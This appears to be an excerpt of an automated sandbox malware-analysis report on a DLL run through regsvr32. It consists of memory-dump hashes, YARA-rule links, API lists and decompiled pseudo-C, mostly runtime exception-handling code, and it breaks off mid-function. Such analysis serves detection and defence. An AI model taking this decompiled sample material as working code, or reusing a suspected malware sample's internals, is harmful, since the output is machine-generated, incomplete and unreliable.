                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                • Instruction ID: 3148a14980ab4aff93d7bfce7efea3731f53904b5888f0c2d97ae5f3d7bf76e1
                                                                                                • Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                • Instruction Fuzzy Hash: 94519DB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19EC25A6250D3B8D665CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5CC84 Relevance: .1, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                • Instruction ID: 7889889aef9fdc3151f0008ed5c778dea0831adbf2613ef6ab2508600c8d36b0
                                                                                                • Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                • Instruction Fuzzy Hash: CE41C3B090074E8FDB48DF64C88A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4FFB8 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                • Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
                                                                                                • Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                • Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F58E08 Relevance: .1, Instructions: 65COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                • Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
                                                                                                • Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                • Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F54F18 Relevance: .1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                • Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
                                                                                                • Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                • Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F515C8 Relevance: .1, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                • Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
                                                                                                • Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                • Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00000001800070A0 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x800223a8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80007101;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x800223a8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x800223a8 = r8d;
				 *0x800223ac = r8d;
				return 0;
			}







                                                                                                0x1800070a0
                                                                                                0x1800070a6
                                                                                                0x1800070ab
                                                                                                0x1800070b2
                                                                                                0x1800070b2
                                                                                                0x1800070b9
                                                                                                0x1800070bb
                                                                                                0x1800070c3
                                                                                                0x1800070c9
                                                                                                0x1800070cd
                                                                                                0x1800070d3
                                                                                                0x1800070d7
                                                                                                0x1800070e1
                                                                                                0x1800070eb
                                                                                                0x1800070f6
                                                                                                0x1800070fa
                                                                                                0x180007101
                                                                                                0x18000710f

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                                • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180010190 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 249COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: GestureInfo$CloseHandle
                                                                                                • String ID: 8
                                                                                                • API String ID: 372500805-4194326291
                                                                                                • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                                • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00000001800106E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                • String ID: i
                                                                                                • API String ID: 3181456275-3865851505
                                                                                                • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                                • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000FCB0 Relevance: 13.7, APIs: 9, Instructions: 204COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                • String ID:
                                                                                                • API String ID: 1917832262-0
                                                                                                • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                                • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180003328 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 66%
                                                                                                			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0x80021010; // 0xeaed15642a89
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
				if ( *_t236 != 0xe06d7363) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
				E00000001180002D40(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
				E00000001180002D40(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00000001180002D40(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
				E00000001180002D40(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
				E00000001180002D40(_t220);
				E00000001180002D40(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
				goto 0x800037b0;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0x80003678;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0x8000366b;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0x8000366b;
				r12d = r15d;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0x80003658;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E0000000118000241C(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E0000000118000241C(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0x800035e8;
				E0000000118000241C(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0x800035ac;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0x8000365f;
				goto 0x80003565;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0x80003664;
				goto 0x80003668;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0x8000369e;
				E00000001180002408(_t282 - 8);
				if (_t209 != 0) goto 0x800036bf;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
				if (_t280[8] == r15d) goto 0x800036e4;
				E00000001180002408(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0x800036e7;
				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0x80003784;
				if (_t280[3] <= 0) goto 0x80003784;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00000001180002D40(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

































                                                                                                0x180003328
                                                                                                0x180003335
                                                                                                0x18000333a
                                                                                                0x180003341
                                                                                                0x180003348
                                                                                                0x18000334b
                                                                                                0x18000334f
                                                                                                0x180003359
                                                                                                0x180003363
                                                                                                0x180003368
                                                                                                0x18000336b
                                                                                                0x180003376
                                                                                                0x18000337d
                                                                                                0x180003382
                                                                                                0x180003385
                                                                                                0x18000338a
                                                                                                0x180003390
                                                                                                0x180003399
                                                                                                0x1800033a5
                                                                                                0x1800033af
                                                                                                0x1800033c0
                                                                                                0x1800033cb
                                                                                                0x1800033d1
                                                                                                0x1800033db
                                                                                                0x1800033e1
                                                                                                0x1800033e6
                                                                                                0x1800033ea
                                                                                                0x1800033f3
                                                                                                0x1800033fc
                                                                                                0x180003401
                                                                                                0x18000340c
                                                                                                0x180003412
                                                                                                0x18000341f
                                                                                                0x180003426
                                                                                                0x18000342c
                                                                                                0x180003436
                                                                                                0x180003438
                                                                                                0x180003441
                                                                                                0x18000344c
                                                                                                0x180003458
                                                                                                0x180003464
                                                                                                0x18000346a
                                                                                                0x180003478
                                                                                                0x18000347c
                                                                                                0x180003486
                                                                                                0x180003490
                                                                                                0x1800034a1
                                                                                                0x1800034a7
                                                                                                0x1800034ae
                                                                                                0x1800034be
                                                                                                0x1800034c9
                                                                                                0x1800034ce
                                                                                                0x1800034d1
                                                                                                0x1800034d6
                                                                                                0x1800034da
                                                                                                0x1800034df
                                                                                                0x1800034e4
                                                                                                0x1800034eb
                                                                                                0x1800034f1
                                                                                                0x1800034f5
                                                                                                0x1800034f9
                                                                                                0x180003508
                                                                                                0x180003517
                                                                                                0x180003521
                                                                                                0x180003524
                                                                                                0x180003528
                                                                                                0x18000352f
                                                                                                0x180003539
                                                                                                0x180003540
                                                                                                0x180003546
                                                                                                0x18000354c
                                                                                                0x180003554
                                                                                                0x180003558
                                                                                                0x18000355f
                                                                                                0x180003568
                                                                                                0x18000356c
                                                                                                0x180003570
                                                                                                0x180003574
                                                                                                0x180003578
                                                                                                0x18000357b
                                                                                                0x18000358c
                                                                                                0x18000358f
                                                                                                0x180003594
                                                                                                0x1800035a1
                                                                                                0x1800035a4
                                                                                                0x1800035aa
                                                                                                0x1800035ac
                                                                                                0x1800035c7
                                                                                                0x1800035d2
                                                                                                0x1800035d8
                                                                                                0x1800035de
                                                                                                0x1800035e0
                                                                                                0x1800035e6
                                                                                                0x1800035e8
                                                                                                0x1800035ee
                                                                                                0x1800035f4
                                                                                                0x180003612
                                                                                                0x18000361a
                                                                                                0x180003622
                                                                                                0x18000362d
                                                                                                0x180003635
                                                                                                0x18000363e
                                                                                                0x180003647
                                                                                                0x18000364c
                                                                                                0x180003651
                                                                                                0x180003656
                                                                                                0x18000365d
                                                                                                0x180003668
                                                                                                0x18000366b
                                                                                                0x180003672
                                                                                                0x180003684
                                                                                                0x18000368a
                                                                                                0x18000368e
                                                                                                0x180003690
                                                                                                0x18000369c
                                                                                                0x1800036a6
                                                                                                0x1800036b9
                                                                                                0x1800036c7
                                                                                                0x1800036d1
                                                                                                0x1800036d3
                                                                                                0x1800036db
                                                                                                0x1800036e2
                                                                                                0x1800036f1
                                                                                                0x180003704
                                                                                                0x180003709
                                                                                                0x18000371a
                                                                                                0x18000371e
                                                                                                0x180003721
                                                                                                0x180003726
                                                                                                0x18000372b
                                                                                                0x18000372f
                                                                                                0x180003736
                                                                                                0x18000373b
                                                                                                0x180003740
                                                                                                0x180003745
                                                                                                0x18000374b
                                                                                                0x180003754
                                                                                                0x180003763
                                                                                                0x18000376b
                                                                                                0x180003772
                                                                                                0x18000377a
                                                                                                0x18000377f
                                                                                                0x180003784
                                                                                                0x18000378e
                                                                                                0x1800037af

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 849930591-393685449
                                                                                                • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                                • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000A3DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				void* _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				WCHAR* _t91;
				long _t94;
				void* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0x80021010; // 0xeaed15642a89
				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0x8000a51f;
				if (_t88 == 0) goto 0x8000a441;
				_t56 = _t88;
				goto 0x8000a521;
				if (__r8 == __r9) goto 0x8000a504;
